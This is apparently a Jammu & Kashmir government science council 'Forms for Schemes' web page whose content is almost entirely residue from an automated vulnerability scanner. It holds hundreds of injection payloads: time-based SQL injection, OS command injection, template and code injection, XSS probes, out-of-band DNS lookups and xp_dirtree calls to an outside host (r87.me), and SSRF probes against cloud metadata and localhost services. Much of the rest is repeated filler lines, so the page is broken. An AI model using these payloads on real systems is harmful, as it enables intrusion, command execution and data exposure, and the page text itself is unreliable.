Govt. of Jammu & Kashmir
J&K Science Technology & Innovation Council
Department Of Science & Technology

Forms for Schemes

 
3
3
3
require 'resolv';Resolv.getaddress ("oij_mfojshznu3-sfnuwwos0gnr17ehcbbg3ucrd".concat "z9y.r87.me")
require 'resolv';Resolv.getaddress ("oij_mfojshuf0egcttsoqu85bbsbz4nyas5gvhbn".concat "r7c.r87.me")
|nslookup${IFS}"oij_mfojshxnavzxejjzgi6j5alrsamd6hcuniuh""aiw.r87.me"
|nslookup${IFS}"oij_mfojshwsmbq0bvazepbuanvuut-wg8ga_jt5""cby.r87.me"
"&nslookup "oij_mfojshwdll-jvox9l5n_o4qhn4ccglqkxl96""ao8.r87.me"
"&nslookup "oij_mfojshoo55u5c_pkjohjwfmrbsjvvinwbho1""uju.r87.me"
'&nslookup "oij_mfojsh3h4neug9qgrnxcv8voo-vnvmwvycav""y2w.r87.me"
'&nslookup "oij_mfojshpp5wlik90u88rc3oob7hhayv22vxlp""hcg.r87.me"
&nslookup "oij_mfojshsfu0sryuxxu6x5sjwyhij1nidpv3ck""4ky.r87.me"
&nslookup "oij_mfojshwkt58qyr3epk1wbtbpumjvoeqgvqkg""nq4.r87.me"
nslookup "oij_mfojshgg6uottfq9zjkofdrpprtgaoc0oyj-""qfe.r87.me"
nslookup "oij_mfojshaebvot5h2hdgdumlnnc4gwzgqrcljz""duq.r87.me"
"+gethostbyname(lc 'oij_mfojshbdjor_jvaravbkosfi8ngvh6d_dgdx'.'f5i.r87.me')+"
"+gethostbyname(lc 'oij_mfojshd9gcq9cdm-xpofpiopjieiv7uh9tdm'.'nvg.r87.me')+"
'+gethostbyname(lc 'oij_mfojshzcdyva6rtrh8rgba6wlplpkihpg5kp'.'tge.r87.me')+'
'+gethostbyname(lc 'oij_mfojsh967bo6cdatpfht_zah1echoagaw-pz'.'z68.r87.me')+'
eval('gethostbyname(lc 'oij_mfojsheusy2tm26nq9w_qlec3gkwfisk5jcv'.'xwq.r87.me')')
eval('gethostbyname(lc 'oij_mfojsh80urbfd4dp5pbfbi460vcxihiksg6d'.'zfk.r87.me')')
gethostbyname(lc 'oij_mfojshuobxqncpm-arfqnd64nqvrft8eyjxd'.'ch0.r87.me')
gethostbyname(lc 'oij_mfojshf3torowbvtwuguzaxa1k8ioacxig72'.'x5a.r87.me')
'{${gethostbyname(trim('oij_mfojshr0usy80mhjhijaljtigxgoo2ijkdmm'.'7b0.r87.me'))}}'
'{${gethostbyname(trim('oij_mfojshhajqgbuq2kqnj-p3ebip7zkzv2zx5l'.'fnc.r87.me'))}}'
"+gethostbyname(trim('oij_mfojshqokrsohyoozluojn1upgpglxklfb7x'.'vza.r87.me'))+"
"+gethostbyname(trim('oij_mfojsh3i4hheayfuapmq4wcloytv17quw57d'.'mr4.r87.me'))+"
'+gethostbyname(trim('oij_mfojshcqdsnpydxvdkwkfmowbi6tcmuluqus'.'5y4.r87.me'))+'
'+gethostbyname(trim('oij_mfojshcg3nmq89suh6pem1aun2eew40emj_e'.'oxa.r87.me'))+'
+gethostbyname(trim('oij_mfojshhwwdhjxg18epsu2kvmmhdmwue_bvmv'.'p3m.r87.me'));//
+gethostbyname(trim('oij_mfojsh7khqkppnghhzxoqfmm951-yqtk0yfi'.'ah8.r87.me'));//
gethostbyname(trim('oij_mfojsh2dmwlinmemgdvxftt-cd3_ijftl0__'.'vgq.r87.me'));
gethostbyname(trim('oij_mfojsheeyijoujzd49etenzo5ysp96efior8'.'ds4.r87.me'));
gethostbyname(trim('oij_mfojshxo_dmzocegr2ru249zztk4rwqo8qbx'.'qa4.r87.me'))
gethostbyname(trim('oij_mfojshf3dboyaijrvayvhvr3vwhlewb5yiqs'.'zaq.r87.me'))
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
https://metadata.packet.net/metadata
3
https://metadata.packet.net/metadata
http://169.254.169.254/opc/v1/instance
3
http://169.254.169.254/opc/v1/instance
https://jkstic.jk.gov.in/server-status
3
https://jkstic.jk.gov.in/server-status
http://[::1]:3306
http://[::1]:3306
3
http://164.100.223.118:3306
http://164.100.223.118:3306
3
http://127.0.0.1:3306
http://127.0.0.1:3306
3
http://[::1]:22
http://[::1]:22
3
http://164.100.223.118:22
http://164.100.223.118:22
3
http://127.0.0.1:22
3
http://127.0.0.1:22
http://169.254.169.254/latest/meta-data/public-hostname
3
http://169.254.169.254/latest/meta-data/public-hostname
http://aws.r87.me/latest/meta-data/public-hostname
3
http://aws.r87.me/latest/meta-data/public-hostname
[::1]/elmah
//r87.com/?0x00965A
3
[::1]/elmah
//r87.com/?0x009659
127.0.0.1/elmah
3
127.0.0.1/elmah
127.100.11.2/elmah
3
%22%2bnetsparker(0x009642)%2b%22
127.100.11.2/elmah
%22%2bnetsparker(0x009641)%2b%22
164.100.223.118/elmah
164.100.223.118/elmah
3
jkstic.jk.gov.in/elmah
3
jkstic.jk.gov.in/elmah
https://jkstic.jk.gov.in/elmah
3
netsparker(0x009606);
https://jkstic.jk.gov.in/elmah
netsparker(0x009605);
3
[::1]/elmah.axd
netsparker(0x0095FA)
[::1]/elmah.axd
netsparker(0x0095F9)
3
127.0.0.1/elmah.axd
127.0.0.1/elmah.axd
3
127.100.11.2/elmah.axd
\';netsparker(0x0094FC);///
127.100.11.2/elmah.axd
\';netsparker(0x0094FB);///
3
164.100.223.118/elmah.axd
"+netsparker(0x0094F2)+"
164.100.223.118/elmah.axd
"+netsparker(0x0094F1)+"
3
jkstic.jk.gov.in/elmah.axd
'+netsparker(0x0094EA)+'
' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 5b70e3ff-141f-4eed-977b-e323ab27a19a */
jkstic.jk.gov.in/elmah.axd
'+netsparker(0x0094E9)+'
' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* ba4201df-7160-443a-934b-9f3cc5efa3e4 */
3
https://jkstic.jk.gov.in/elmah.axd
*/netsparker(0x0094E2);/*
') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* c07c6cb3-41ff-4986-8817-5e0d956f9ac9 */
https://jkstic.jk.gov.in/elmah.axd
*/netsparker(0x0094E1);/*
') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* d616fd43-c874-4ca6-8bac-0eb1b0940a8f */
3
[::1]/trace.axd
body{x:expression(netsparker(0x0094D6))}
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* cfe989db-58f2-47e5-9e02-6cd380297bee */
body{x:expression(netsparker(0x0094D5))}
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 9903dda5-cbd1-4cc8-a9ca-d4b87c2627df */
3
n;ns:expression(netsparker(0x0094C4));
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 1c044b80-7b57-4b84-8164-37319eb70b62 */
127.0.0.1/trace.axd
n;ns:expression(netsparker(0x0094C3));
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 434bd662-2792-44e2-ae63-853ef0c0db8c */
127.0.0.1/trace.axd
3
<%a style=x:expre/**/ssion(netsparker(0x0094B2))>
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* d6c660ae-e99a-4a32-9353-36c213c09884 */
127.100.11.2/trace.axd
<%a style=x:expre/**/ssion(netsparker(0x0094B1))>
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* ff7433ea-4702-4916-9757-52958f299ec8 */
127.100.11.2/trace.axd
3
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 390b100a-d100-4ddd-a556-33326e773263 */
164.100.223.118/trace.axd
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* ffb302c0-482b-4ea5-832b-7a82e4b93b4c */
164.100.223.118/trace.axd
3
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* a64f6f94-1ec3-49e0-acf0-c54f76fb926f */
javascript:netsparker(0x00948E)
jkstic.jk.gov.in/trace.axd
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* a6f30d75-0367-4a28-8500-5315e5e040d5 */
javascript:netsparker(0x00948D)
jkstic.jk.gov.in/trace.axd
3
1));SELECT pg_sleep(25)-- /* b1d0e87c-a6d1-44c6-85ff-b1bd22794e07 */
https://jkstic.jk.gov.in/trace.axd
1));SELECT pg_sleep(25)-- /* 001f7580-dfed-4949-a5cc-dbff9df8f326 */
https://jkstic.jk.gov.in/trace.axd
3
1'));SELECT pg_sleep(25)-- /* 8689d2d7-0685-4a5d-bdc2-416516373539 */
3
1'));SELECT pg_sleep(25)-- /* eceb0a79-ebf0-4124-961f-124d5b0f7417 */
3
1');SELECT pg_sleep(25)-- /* d2ed35b1-85f3-4d9f-9634-7b90a0ef3711 */
3
1');SELECT pg_sleep(25)-- /* 7deea669-dcd8-42af-a7b7-a89941027a53 */
3
1);SELECT pg_sleep(25)-- /* 7ab40bcc-db5e-48c3-aa29-aebafae7a291 */
//r87.com/n/j/?0x009437
3
1);SELECT pg_sleep(25)-- /* 76fb06e7-ebcf-4ff7-89be-336fd97e7d24 */
//r87.com/n/j/?0x009436
3
SELECT pg_sleep(25)-- /* 65974383-a095-47ce-95a4-157109c41fc5 */
//r87.com/n/n.css?0x009427
3
SELECT pg_sleep(25)-- /* 52a1e172-dadc-49d0-b4a5-23a93a2abcf1 */
//r87.com/n/n.css?0x009426
3
1;SELECT pg_sleep(25)-- /* 55d06a50-1a44-4d09-a74b-ccaaa84d0a09 */
1 ns=netsparker(0x00939B)
3
1;SELECT pg_sleep(25)-- /* 16ab7e71-df2b-434a-9b5a-7f40e2cef021 */
1 ns=netsparker(0x00939A)
3
1';SELECT pg_sleep(25)-- /* da129bd3-19bf-4a8e-b86f-2f2f611612dd */
'" ns=netsparker(0x00936D)
3
'" ns=netsparker(0x00936C)
1';SELECT pg_sleep(25)-- /* d5c82417-b418-4065-bb24-80673a4299d0 */
3
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA5MzRCKTwvc2NyaXB0Pg==
3
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA5MzRBKTwvc2NyaXB0Pg==
3
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x00933B%29%3C%2FscRipt%3E
3
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x00933A%29%3C%2FscRipt%3E
3
3
3
((select sleep(25)))a-- 1 /* 477ab141-4fc2-425b-a04d-de2622dfcf84 */
N3TSP4RKE2
nxtspxrkex
n3tsp4rke2
3
3
((select sleep(25)))a-- 1 /* 850b4cd3-5526-4de5-bd6b-eb29b9322e2a */
3
3
3
3
3
3
3
3
3
1'))exec('xp_dirtree ''\\oij_mfojshnl6f8098neb3yzcw7o15oq70ts2yax'+'j_i.r87.me'+'\c$\a''')--
3
1'))exec('xp_dirtree ''\\oij_mfojsh8ut1diosu2jlmmhrzucyg4r4qizdep'+'o2c.r87.me'+'\c$\a''')--
3
3
1))exec('xp_dirtree ''\\oij_mfojsh4wgfmonxlypprvukoa_zhnpcdvhb5j'+'yak.r87.me'+'\c$\a''')--
3
1))exec('xp_dirtree ''\\oij_mfojshwrvi-j7tua9utb0cw514gsg1p4x_fu'+'axc.r87.me'+'\c$\a''')--
3
3
1')exec('xp_dirtree ''\\oij_mfojshcimpskiwb1rqft03m45wnzjkf3stdu'+'d1m.r87.me'+'\c$\a''')--
3
1')exec('xp_dirtree ''\\oij_mfojshkhlxacqudnsnaf-v2wyartaefsa-ni'+'t9s.r87.me'+'\c$\a''')--
3
1)) WAITFOR DELAY '0:0:25'-- /* 3c2c0e62-f069-4cc5-b94d-1152816f166a */
3
1)) WAITFOR DELAY '0:0:25'-- /* 0de2a2a9-71ea-4d93-857b-e94d58ade8b6 */
1) exec('xp_dirtree ''\\oij_mfojsh4chyyi02jtlfx1rihust6sgh95h6p_'+'_z4.r87.me'+'\c$\a''')--
3
3
')) WAITFOR DELAY '0:0:25'-- /* a24097ef-da9b-4141-96cc-7351dd5f0563 */
3
1) exec('xp_dirtree ''\\oij_mfojshg4jebaqcp21zrtd9uqw3_ekgoxa4nn'+'3v4.r87.me'+'\c$\a''')--
-1';exec('xp_dirtree ''\\oij_mfojshqyj54aimbxwnda1fgzztxob-tsvjkt'+'zno.r87.me'+'\c$\a''')--
')) WAITFOR DELAY '0:0:25'-- /* a88bfe9c-a9fb-4334-bb4d-2153224d1bd8 */
3
3
3
-1';exec('xp_dirtree ''\\oij_mfojshzky0c9hq7decrfcbtcu5hnelzcky4b'+'tba.r87.me'+'\c$\a''')--
') WAITFOR DELAY '0:0:25'-- /* 82ead29b-4f22-4630-9f46-afbc3db3c7bb */
1;exec('xp_dirtree ''\\oij_mfojsh-fk2jzg7afpickjwbd8jvmkp4j8ywf'+'unk.r87.me'+'\c$\a''')--
') WAITFOR DELAY '0:0:25'-- /* c0b897a6-5f0a-44c9-bfe6-d24a953dcfc8 */
3
3
3
1) WAITFOR DELAY '0:0:25'-- /* 4a888caa-8c4a-4de7-b48b-b16244c1efc0 */
1) WAITFOR DELAY '0:0:25'-- /* 4402139f-bd62-435b-9d95-5b04f0c6205a */
1;exec('xp_dirtree ''\\oij_mfojsh_4iwdeik_qaiyda2im7qi68lzej1-7'+'bks.r87.me'+'\c$\a''')--
3
3
3
WAITFOR DELAY '0:0:25'-- /* 605c92ca-6349-4285-b807-2e9821fe4ade */
WAITFOR DELAY '0:0:25'-- /* 219af9e7-4640-40bb-8506-2d66f128a3ae */
3
3
exec('xp_dirtree ''\\oij_mfojshpspdp16st8yvtjf9us0jzm9f9ya6e-'+'ux0.r87.me'+'\c$\a''')
1 WAITFOR DELAY '0:0:25'-- /* 270294a1-9183-4e8e-912a-7db023965871 */
exec('xp_dirtree ''\\oij_mfojshuphz-ahsfpblyaxwarkpycnjq91oyo'+'0lo.r87.me'+'\c$\a''')
1 WAITFOR DELAY '0:0:25'-- /* 6e269084-7c4f-473c-9c4d-3f0f82cd0802 */
3
3
3
' WAITFOR DELAY '0:0:25'-- /* dd9351c9-ffe3-4244-b7c2-8d0cebdd6dee */
3
' WAITFOR DELAY '0:0:25'-- /* 152df985-987d-44e6-a8f1-e6cee7e11ebf */
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
__import__('os').popen(('SET /A 268409241 - {0}').format('72944')).read()
3
3
3
3
__import__('os').popen(('SET /A 268409241 - {0}').format('46116')).read()
3
3
__import__('os').popen(('expr 268409241 - {0}').format('90008')).read()
3
3
3
__import__('os').popen(('expr 268409241 - {0}').format('35508')).read()
3
3
p "#{0xFFF9999.to_i-`echo 39321`.to_i}"
3
3
3
3
3
p "#{0xFFF9999.to_i-`echo 98312`.to_i}"
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-19613)}
3
3
3
3
3
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-45533)}
3
arguments[1].end(require('child_process').execSync('set /A 268409241 - 17038'))
3
3
3
3
arguments[1].end(require('child_process').execSync('set /A 268409241 - 75279'))
3
3
arguments[1].end(require('child_process').execSync('expr 268409241 - 90918'))
3
3
3
arguments[1].end(require('child_process').execSync('expr 268409241 - 52981'))
3
3
"+print localtime()*0+0xFFF9999-56052+"
3
3
3
"+print localtime()*0+0xFFF9999-71742+"
3
3
'+print localtime()*0+0xFFF9999-50854+'
3
3
3
'+print localtime()*0+0xFFF9999-90597+'
3
eval('print localtime()*0+0xFFF9999-2489')
3
3
3
3
eval('print localtime()*0+0xFFF9999-48350')
3
print localtime()*0+0xFFF9999-35315
3
3
3
3
print localtime()*0+0xFFF9999-42901
3
3
3
3
3
3
[php]print(int)0xFFF9999-43499;[/php]
3
3
3
[php]print(int)0xFFF9999-14924;[/php]
3
3
'{${print(int)0xFFF9999-72867}}'
3
3
3
3
'{${print(int)0xFFF9999-79650}}'
3
3
3
3
{php}print(int)0xFFF9999-72233;{/php}
3
3
{php}print(int)0xFFF9999-33068;{/php}
3
3
3
3
3
3
3
3
3
3
"+print(int)0xFFF9999-16725+"
3
3
"+print(int)0xFFF9999-6680+"
3
3
3
3
3
3
'+print(int)0xFFF9999-59062+'
3
3
3
+print(int)0xFFF9999-82014;//
3
3
+print(int)0xFFF9999-17597;//
3
3
3
print(int)0xFFF9999-41862;
3
print(int)0xFFF9999-26487;
3
3
3
3
print(int)0xFFF9999-76874
3
3
print(int)0xFFF9999-94364
3
3
<% response.write(268409241-17232) %>
3
3
<% response.write(268409241-8465) %>
3
3
3
"+response.write(268409241-40979)+"
3
3
"+response.write(268409241-37832)+"
3
3
3
+response.write(268409241-12761)'
3
3
+response.write(268409241-68356)'
3
3
3
response.write(268409241-50324)'
3
response.write(268409241-98833)'
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
3
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
'+NSFTW+'
3
'+NSFTW+'
3
3
3
NSFTW
3
NSFTW
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3
3
3
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3
3
3
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
3
3
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
3
3
3
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
3
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
3
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
3
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
3
3
%27
3
3
3
%27
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
|expr${IFS}268409241${IFS}-${IFS}22155
3
3
|expr${IFS}268409241${IFS}-${IFS}55874
3
3
3
3
3
3
3
3
3
3
3
expr 268409241 - 51750
3
3
3
expr 268409241 - 99791
3
3
3
3
expr 268409241 - 75824;
3
3
3
expr 268409241 - 99629;
3
3
3
3
3
3
1;expr 268409241 - 14190;x
3
3
3
3
1';expr 268409241 - 22789;'
3
3
3
1';expr 268409241 - 28782;'
3
3
3
3
1";expr 268409241 - 91090;"
3
3
3
1";expr 268409241 - 65435;"
3
3
3
3
| SET /A 0xFFF9999-40735
3
3
3
| SET /A 0xFFF9999-77842
3
3
3
3
3
SET /A 0xFFF9999-74462
3
SET /A 0xFFF9999-17435
3
3
SET /A 0xFFF9999-21435 &
3
3
3
SET /A 0xFFF9999-30307 &
3
3
3
& SET /A 0xFFF9999-57399 &
3
3
& SET /A 0xFFF9999-46504 &
3
3
3
|ping -n 25 127.0.0.1
3
'& SET /A 0xFFF9999-74972 &
3
|ping -n 25 127.0.0.1
'& SET /A 0xFFF9999-84057 &
3
3
3
3
ping -w 25 127.0.0.1
"& SET /A 0xFFF9999-68299 &
ping -w 25 127.0.0.1
3
"& SET /A 0xFFF9999-68999 &
3
3
3
3
ping -n 25 127.0.0.1
3
ping -n 25 127.0.0.1
3
oij_mfojshpwa6mczvjvhwgyp2rxt56ggtizu8ebglz.r87.me/p/
3
3
3
3
ping -w 25 127.0.0.1 &
3
oij_mfojshpsua0gn6nwc30iejv6q5lvr5psrtomjlz.r87.me/p/
3
ping -w 25 127.0.0.1 &
3
php://filter//resource=http://oij_mfojsha3p3axgkdyxuuh0waj3wfemhg8h5r9vqp.r87.me/p/
3
3
3
&ping -w 25 127.0.0.1 &
3
php://filter//resource=http://oij_mfojshroxa0nplxeicaaniqknbdw7uuwbx_pflp.r87.me/p/
3
&ping -w 25 127.0.0.1 &
http://oij_mfojshdca_uid-sxxfsb3ij-3fgmxizissj7c_v.r87.me/p/
3
3
3
3
3
'&ping -w 25 127.0.0.1 &'
http://oij_mfojsh_tnkq61jiyfrzmhgplbdscj2inrkrkoqb.r87.me/p/
3
3
3
'&ping -w 25 127.0.0.1 &'
3
3
3
"&ping -w 25 127.0.0.1 &"
3
3
3
3
3
-1" OR 1=1 OR "1"="1
"&ping -w 25 127.0.0.1 &"
3
3
-1" OR 1=1 OR "1"="1
3
ping -n 25 127.0.0.1 &
3
3
3
3
3
3
3
ping -n 25 127.0.0.1 &
3
-1' OR 1=1 OR '1'='1
3
3
& ping -n 25 127.0.0.1 &
3
-1' OR 1=1 OR '1'='1
3
3
3
{{ 268409241- 79495 }}
3
& ping -n 25 127.0.0.1 &
3
-1 OR X='ss
3
3
3
{{ 268409241- 53802 }}
http://r87.me/r/?id=oij_mfojshz1exyp0k6mfba5h-zyrzb3vbq7pfgvrr4
'& ping -n 25 127.0.0.1 &
3
-1 OR 17-7=10
3
3
(268409241-4640)
3
3
http://r87.me/r/?id=oij_mfojshnrilapu_h5tgh1q26dh1kvu0skvdho7za
'& ping -n 25 127.0.0.1 &
-1" OR 1=1 OR "ns"="ns
3
3
3
(268409241-5925)
//oij_mfojshuw0vopjfuohy3aq0wcsd8-tl-droiw1is.r87.me
"& ping -n 25 127.0.0.1 &
3
-1' OR 1=1 OR 'ns'='ns
3
3
{{ 268409241- 38426 }}
3
3
3
//oij_mfojshalxvnby9zsenganaldg3znd1adutfo9bu.r87.me
"& ping -n 25 127.0.0.1 &
-1 AND 'NS='ss
3
3
3
{{ 268409241- 43618 }}
3
3
oij_mfojshsky6acwrxijd_m4z6gvhvh5v2hpspqadg.r87.me
NS-1NO
3
3
3
@(268409241-2353)
3
3
oij_mfojshtsmwtjcggkwevhzvgqoji5hd_lwgm-zrg.r87.me
'
3
3
3
@(268409241-77521)
3
3
3
3
-1 OR 1=1
3
3
<%= "#{268409241-76756}" %>
3
-1 OR 1=1
3
3
3
<%= "#{268409241-80375}" %>
3
3
3
-1 OR 1=1
3
3
3
3
<#assign x=268409241 - 26695> ${x?string["0"]}
3
3
-1 OR 1=1
3
3
3
<#assign x=268409241 - 55473> ${x?string["0"]}
3
-1" OR 1=1 OR "1"="1
3
3
3
3
3
<%- 268409241-41394 %>
3
3
-1" OR 1=1 OR "1"="1
3
3
3
3
-1' OR 1=1 OR '1'='1
<%- 268409241-73575 %>
3
3
3
3
3
3
-1' OR 1=1 OR '1'='1
3
=268409241-18898
3
3
3
3
-1 OR X='ss
3
=268409241-7012
3
3
3
3
3
3
-1 OR 17-7=10
{{268409241-80329}}
3
3
3
3
3
-1" OR 1=1 OR "ns"="ns
{{268409241-9352}}
3
3
3
3
3
-1' OR 1=1 OR 'ns'='ns
3
3
3
3
3
3
3
-1 AND 'NS='ss
3
3
3
3
NS-1NO
3
3
3
3
3
3
'
3
3
3
3
3
-1 OR 1=1
3
3
3
3
3
-1 OR 1=1
3
3
3
-1 OR 1=1
3
3
3
3
3
-1 OR 1=1
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
&thisdoesntexists;
3
3
3
3
3
&thisdoesntexists;
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
NS09?s1?DBL?SNGL?NS09
3
3
3
3
3
NS09?s1?DBL?SNGL?NS09
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
r87.com/n
3
3
3
r87.com/n
3
3
3
3
3
php://filter//resource=http://r87.com/n?.aspx
3
3
3
3
php://filter//resource=http://r87.com/n?.aspx
3
3
3
3
3
3
http://r87.com/n?.aspx
3
3
3
3
ns:netsparker056650=vuln
http://r87.com/n?.aspx
3
3
3
3
http://r87.com/n?.aspx
ns:netsparker056650=vuln
3
N3tSp4rK3R
3
3
3
ns:netsparker056650=vuln
http://r87.com/n?.aspx
3
N3tSp4rK3R
3
3
ns:netsparker056650=vuln
hTTp://r87.com/n
3
3
3
3
3
http://example.com/? ns: netsparker056650=vuln
3
hTTp://r87.com/n
3
3
http://example.com/? ns: netsparker056650=vuln
3
3
3
3
3
3
3
3
3
ns:netsparker056650=vuln
3
3
ns:netsparker056650=vuln
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
#{28275*28275-(28109)}
3
3
3
3
3
3
#{28275*28275-(11635)}
3
3
3
3
3
3
3
${28275*28275-(3161)}
3
3
3
3
${28275*28275-(20577)}
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
__import__('os').popen(('SET /A 268409241 - {0}').format('95975')).read()
3
3
3
WAITFOR DELAY '0:0:25'-- /* 56d720a7-fe8e-4a4f-8061-d83492fe1725 */
__import__('os').popen(('expr 268409241 - {0}').format('44685')).read()
3
WAITFOR DELAY '0:0:25'-- /* 3b74b35e-eb60-4c89-8fea-28cec3ef413d */
__import__('os').popen(('expr 268409241 - {0}').format('42509')).read()
3
3
3
1 WAITFOR DELAY '0:0:25'-- /* 9ac9b910-1ae6-41d5-8244-0bd3c5898c19 */
p "#{0xFFF9999.to_i-`echo 16682`.to_i}"
3
1 WAITFOR DELAY '0:0:25'-- /* 1c0cf1be-a9db-42ef-a901-e0733234744c */
p "#{0xFFF9999.to_i-`echo 61891`.to_i}"
3
3
3
' WAITFOR DELAY '0:0:25'-- /* 071a0f25-370c-4cad-8b0c-4e613c3ad74f */
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-14501)}
3
' WAITFOR DELAY '0:0:25'-- /* d8f5bc90-1d06-4683-a3da-e17aa436cd0b */
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-72966)}
3
3
3
3
arguments[1].end(require('child_process').execSync('set /A 268409241 - 84545'))
3
arguments[1].end(require('child_process').execSync('set /A 268409241 - 31210'))
3
3
3
3
arguments[1].end(require('child_process').execSync('expr 268409241 - 20959'))
3
3
arguments[1].end(require('child_process').execSync('expr 268409241 - 7792'))
3
3
3
"+print localtime()*0+0xFFF9999-18997+"
3
3
"+print localtime()*0+0xFFF9999-80444+"
3
3
3
'+print localtime()*0+0xFFF9999-5248+'
3
3
'+print localtime()*0+0xFFF9999-56459+'
3
3
3
eval('print localtime()*0+0xFFF9999-37246')
3
3
eval('print localtime()*0+0xFFF9999-20270')
3
3
3
print localtime()*0+0xFFF9999-23414
3
3
print localtime()*0+0xFFF9999-25255
3
3
3
3
3
3
3
[php]print(int)0xFFF9999-73048;[/php]
3
3
3
[php]print(int)0xFFF9999-1974;[/php]
3
3
'{${print(int)0xFFF9999-23523}}'
3
3
3
'{${print(int)0xFFF9999-78985}}'
3
3
{php}print(int)0xFFF9999-59247;{/php}
3
3
3
{php}print(int)0xFFF9999-71633;{/php}
3
3
3
3
3
3
3
3
"+print(int)0xFFF9999-17518+"
3
3
3
"+print(int)0xFFF9999-57226+"
3
3
'+print(int)0xFFF9999-83596+'
3
3
3
'+print(int)0xFFF9999-98993+'
3
3
+print(int)0xFFF9999-60552;//
3
3
+print(int)0xFFF9999-67132;//
3
3
3
print(int)0xFFF9999-61869;
3
3
print(int)0xFFF9999-93642;
3
3
3
print(int)0xFFF9999-98594
3
3
print(int)0xFFF9999-99309
3
3
